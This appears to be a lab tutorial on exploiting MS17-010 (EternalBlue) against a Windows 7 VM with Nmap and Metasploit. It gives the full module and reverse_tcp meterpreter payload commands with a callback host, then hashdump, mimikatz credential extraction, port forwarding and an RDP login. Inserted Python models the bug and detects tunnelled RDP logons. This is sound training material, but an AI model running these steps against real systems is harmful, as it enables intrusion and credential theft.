Lab environment
- Attacker: Kali 2017
- Attacker IP: 172.16.11.2
- Target: Windows 7
- Target IP: 172.16.12.2
Purpose
- Understand the risk posed by Windows remote overflow vulnerabilities
- Understand the discovery and verification process for the MS17-010 vulnerability
- Learn to use the advanced features of Metasploit
Experimental tools
Nmap: port scanning tool for detecting which ports are open; this time we use its port scanning and vulnerability scanning capabilities
Metasploit: open-source penetration testing framework that bundles exploits; this experiment uses its exploit modules and the meterpreter component
Experiment content
Overview of the vulnerability principle
MS17-010 is a vulnerability in Windows SMBv1. It lies in the kernel-mode function srv!SrvOs2FeaListToNt, which converts FEA (File Extended Attributes) lists, and it results in a buffer overflow in the large non-paged kernel pool (Large Non-Paged Kernel Pool).
Before srv!SrvOs2FeaListToNt converts the FEA list into an NTFEA (Windows NT FEA) list, it calls srv!SrvOs2FeaListSizeToNt to calculate the size of the FEA list after conversion. Because that size is calculated incorrectly, the converted list overflows the buffer allocated for it.
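To make the "size calculation error" concrete, the following Python model is an added example written for this page; it is not srv.sys code and its wire layout (a 32-bit cbList header followed by flags/name_len/value_len entries) and NTFEA entry size are simplifications chosen here. It assumes the root cause described in public analyses of the bug: the size function writes the consumed length back into the 32-bit cbList field through a 16-bit store, so the attacker-controlled high word survives and the conversion loop, bounded by cbList, walks more entries than the allocation was sized for. The `narrow_writeback=False` path shows the consistent bound a correct implementation keeps.

```python
import struct

# Simplified model of the OS/2 FEA list that srv!SrvOs2FeaListToNt converts.
# Constructed for this page; it is NOT srv.sys code. Assumed wire layout:
#   list header : cbList (uint32, total bytes including this header)
#   each entry  : flags (uint8), name_len (uint8), value_len (uint16), name, value
HDR, ENTRY_HDR = 4, 4

def build_fea_list(entries, cb_list=None):
    """Serialise (name, value) pairs; cb_list overrides the true length (the field a client controls)."""
    body = b"".join(struct.pack("<BBH", 0, len(n), len(v)) + n + v for n, v in entries)
    cb = HDR + len(body) if cb_list is None else cb_list
    return struct.pack("<I", cb) + body

def nt_entry_size(name_len, value_len):
    """Modelled NTFEA entry: 8-byte header + name + NUL + value, rounded up to 4 bytes."""
    return (8 + name_len + 1 + value_len + 3) & ~3

def walk(buf, end):
    """Yield (offset, name_len, value_len) for every entry that fits entirely before `end`."""
    off = HDR
    while off + ENTRY_HDR <= min(end, len(buf)):
        _, nl, vl = struct.unpack_from("<BBH", buf, off)
        if off + ENTRY_HDR + nl + vl > end:
            break  # this entry straddles the declared end of the list
        yield off, nl, vl
        off += ENTRY_HDR + nl + vl

def size_to_nt(buf, narrow_writeback):
    """Model of srv!SrvOs2FeaListSizeToNt: sum the converted size of the entries that fit,
    then write the number of bytes actually consumed back into cbList."""
    cb_list, = struct.unpack_from("<I", buf, 0)
    nt_size, consumed = 0, HDR
    for off, nl, vl in walk(buf, cb_list):
        nt_size += nt_entry_size(nl, vl)
        consumed = off + ENTRY_HDR + nl + vl
    if narrow_writeback:
        # The bug class: a 32-bit length updated through a 16-bit store keeps the
        # attacker-supplied high word, so cbList no longer corresponds to nt_size.
        cb_list = (cb_list & 0xFFFF0000) | (consumed & 0xFFFF)
    else:
        cb_list = consumed  # full-width write-back: both functions agree on the bound
    return nt_size, cb_list

def list_to_nt(buf, narrow_writeback):
    """Model of srv!SrvOs2FeaListToNt. Returns the allocation size, the bytes the
    conversion loop would write, and whether that exceeds the allocation."""
    allocated, cb_list = size_to_nt(buf, narrow_writeback)
    needed = sum(nt_entry_size(nl, vl) for _, nl, vl in walk(buf, cb_list))
    return {"allocated": allocated, "needed": needed, "overflow": needed > allocated}

# Constructed input: 32 entries of 0x1000 bytes each (0x20004 bytes in total) while
# cbList claims 0x10000, so the 16th entry straddles the declared end of the list.
ENTRIES = [(b"", b"A" * 0xFFC)] * 32
CRAFTED = build_fea_list(ENTRIES, cb_list=0x10000)
WELL_FORMED = build_fea_list(ENTRIES)

if __name__ == "__main__":
    print("narrow write-back:", list_to_nt(CRAFTED, narrow_writeback=True))
    print("full-width write-back:", list_to_nt(CRAFTED, narrow_writeback=False))
```

With the narrowed write-back the size function budgets for 15 entries (0xF078 bytes) while the conversion loop walks 31 (0x1F0F8 bytes); with a full-width write-back both loops stop at the same entry, and a well-formed list behaves identically in both modes, which is why the defect only shows up for a cbList that disagrees with the data.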
Experimental procedure
When the NSA toolkit was leaked, we already explained how to use the EternalBlue tool it contains: [NSA] Windows 0day hacker toolkit validation experiments.
However, that tool has demanding environment requirements and a complex workflow. Metasploit (msf) has since added it as a module, which is far more convenient. Let's get started!
Step 1: Port probing
On Kali, use Nmap to scan the target's open ports:
nmap -Pn -sV 172.16.12.2
The target has ports 135, 139, 445, 3389 and others open, and the target system is identified as Windows 7.
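Reading the scan by eye works for one host; for a subnet it is easier to save the scan with nmap's grepable output (`-oG`) and triage it. The parser below is an added example written for this page, not part of the original write-up or of nmap; the sample output is constructed to mirror the ports the write-up reports (135, 139, 445, 3389) and the triage labels are my own naming.

```python
import re

# Constructed sample of nmap "grepable" (-oG) output for the lab target. It is not
# captured from the original experiment; the ports mirror those the write-up lists.
SAMPLE_GNMAP = """\
# Nmap 7.70 scan initiated as: nmap -Pn -sV -oG scan.gnmap 172.16.12.2
Host: 172.16.12.2 ()\tStatus: Up
Host: 172.16.12.2 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 445/open/tcp//microsoft-ds//Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)/, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Service/\tIgnored State: closed (996)
"""

# -oG port entries: port/state/proto/owner/service/rpcinfo/version/ (owner, rpcinfo usually empty)
PORT_RE = re.compile(r"(\d+)/([^/]+)/(\w+)/[^/]*/([^/]*)/[^/]*/([^/]*)/")

def parse_gnmap(text):
    """Map host -> list of (port, state, proto, service, version) from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if field.startswith("Ports:"):
                for m in PORT_RE.finditer(field):
                    port, state, proto, service, version = m.groups()
                    hosts.setdefault(host, []).append((int(port), state, proto, service, version))
    return hosts

def triage(hosts):
    """Flag hosts worth following up: SMB (445) exposed on a Windows box, and RDP (3389) reachable."""
    findings = {}
    for host, ports in hosts.items():
        open_ports = {p for p, state, *_ in ports if state == "open"}
        windows = any("windows" in (svc + " " + ver).lower() for _, _, _, svc, ver in ports)
        flags = []
        if 445 in open_ports and windows:
            flags.append("smb-exposed-windows")  # verify the MS17-010 patch, disable SMBv1
        if 3389 in open_ports:
            flags.append("rdp-exposed")  # restrict 3389 at the firewall, require NLA
        if flags:
            findings[host] = flags
    return findings

if __name__ == "__main__":
    for host, flags in triage(parse_gnmap(SAMPLE_GNMAP)).items():
        print(host, ", ".join(flags))
```

Run against a real file with `parse_gnmap(open("scan.gnmap").read())`; the regex tolerates the empty owner and rpcinfo fields and states such as `open|filtered`.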
Step 2: Vulnerability scanning
We use a scanner module to determine whether the vulnerability is exploitable.
Remember the nmap script for scanning ms08-067? MSF has a scanner module for this one ~
In the terminal, enter
msfconsole
to open the Metasploit command-line client, then use the search command to find the modules related to ms17-010:
search ms17-010
The related modules are listed. Use the use command to select the scanner module we want:
use auxiliary/scanner/smb/smb_ms17_010
Before running the module, its options need to be set; use show options to check the configuration.
The target address must be set:
set RHOSTS 172.16.12.2
After setting it, execute run or exploit and wait for the result.
Step 3: Exploitation
The previous step shows that the vulnerability is exploitable, so we now turn to the exploit module:
use exploit/windows/smb/ms17_010_eternalblue
As above, check the configuration and set every option whose Required column is yes:
show options
Target host address: 172.16.12.2
set RHOST 172.16.12.2
Note that here the option is RHOST, unlike RHOSTS in the scanner.
Next, select the payload, that is, the shellcode. Here we choose a meterpreter shell that connects back to the controlling terminal:
set payload windows/x64/meterpreter/reverse_tcp
The payload also needs configuring; run show options to view its configuration.
The local host LHOST is not set yet, so set it:
set LHOST 172.16.11.2
The local port LPORT defaults to 4444 and can be changed with
set LPORT <port>
Once the configuration is complete, run exploit or run to start the exploit module.
We successfully obtain a session from the target host.
Step 4: Remote login to the target
Now that we have a session, we continue by introducing other features of the meterpreter post-exploitation module.
Run sysinfo to view information about the target machine.
Running help shows which functions meterpreter provides.
Next, we obtain the target's password hashes by running hashdump.
mimikatz is a well-known credential extraction tool. It can extract plaintext passwords, hashes, PINs and Kerberos credentials from Windows memory, and meterpreter integrates it.
Running load mimikatz loads the tool; its commands are the same as in mimikatz itself.
Run msv to export the hashes, then run kerberos to obtain the target's account password.
With the target's credentials and the nmap scan results, we could log in to the target remotely. In practice, however, a firewall usually blocks incoming requests to port 3389 from outside. How do we handle that?
We can use a port-forwarding tool to forward the port to a port on the attacker's local machine and connect through it.
Run the command
portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r 172.16.12.2
Here we forward the target's remote port 3389 to port 3389 on the local machine 172.16.11.2.
The local port number can be set to any other port that is not already listening.
Then we just run
rdesktop 127.0.0.1 -u ichunqiu -p ichunqiu
to log in to the remote target.
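From the defender's side, the forwarded RDP session above looks different from a normal one: the connection is made by the compromised host to itself, so the logon recorded on the target carries the target's own address or loopback as the source rather than another machine's address. The following Python detection logic is an added example written for this page, not part of the original write-up; it assumes that view of the logon (an assumption about how the tunnelled session is recorded), uses constructed Security-log events flattened to key=value lines, and a constructed asset inventory mapping each host name to its own IP addresses.

```python
# Constructed sample Security-log events (not from the original experiment), one
# key=value record per line in the shape a log exporter might emit.
SAMPLE_EVENTS = """\
EventID=4624 Computer=WIN7-TARGET LogonType=10 TargetUserName=ichunqiu IpAddress=172.16.12.2 IpPort=49162
EventID=4624 Computer=WIN7-TARGET LogonType=10 TargetUserName=alice IpAddress=172.16.11.50 IpPort=50213
EventID=4624 Computer=WIN7-TARGET LogonType=3 TargetUserName=svc_backup IpAddress=127.0.0.1 IpPort=0
EventID=4624 Computer=WIN7-TARGET LogonType=10 TargetUserName=ichunqiu IpAddress=127.0.0.1 IpPort=49170
EventID=4625 Computer=WIN7-TARGET LogonType=10 TargetUserName=admin IpAddress=172.16.11.2 IpPort=51000
"""

# Constructed asset inventory: host name -> the addresses that host owns.
HOST_ADDRESSES = {"WIN7-TARGET": {"172.16.12.2"}}
LOOPBACK = {"127.0.0.1", "::1"}

def parse_events(text):
    """Turn key=value lines into dicts; blank lines are skipped."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in text.splitlines() if line.strip()]

def tunneled_rdp_logons(events, host_addresses):
    """Successful interactive RDP logons (4624, LogonType 10) whose source address is
    loopback or one of the host's own addresses. A genuine RDP user connects from
    another machine, so a self-sourced logon is consistent with RDP relayed through
    a tunnel running on the host (such as the portfwd setup above)."""
    hits = []
    for ev in events:
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "10":
            continue
        own = host_addresses.get(ev.get("Computer"), set()) | LOOPBACK
        if ev.get("IpAddress") in own:
            hits.append((ev["Computer"], ev["TargetUserName"], ev["IpAddress"]))
    return hits

if __name__ == "__main__":
    for computer, user, src in tunneled_rdp_logons(parse_events(SAMPLE_EVENTS), HOST_ADDRESSES):
        print(f"self-sourced RDP logon on {computer}: user={user} source={src}")
```

The rule deliberately ignores LogonType 3 loopback logons, which local services produce routinely, and failed logons (4625), which belong to a separate brute-force rule; the inventory lookup is what lets it treat the host's routable address the same way as 127.0.0.1.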
Analysis of results and summary
Through this experiment we have become familiar with the whole process from discovering a vulnerability, to verifying it, to exploiting it, and have further studied the use of other Metasploit post-exploitation modules.